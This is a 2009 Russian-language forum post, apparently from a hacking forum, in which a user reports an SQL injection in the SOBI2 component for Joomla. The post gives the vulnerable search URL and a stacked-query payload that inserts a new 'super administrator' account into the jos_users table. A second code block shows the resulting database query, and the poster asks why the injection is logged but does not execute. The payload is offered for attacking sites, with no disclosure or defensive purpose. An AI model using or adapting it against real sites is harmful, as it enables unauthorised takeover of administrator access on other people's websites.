10.08.2009, 01:11
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами:
9288289
Репутация:
40
|
|
Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid =26
в поиск ввести
Код:
a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
Поубирать пробелы надо обяательно
Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.
Код:
SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
Последний раз редактировалось FAQ666; 10.08.2009 в 10:08..
|
|
|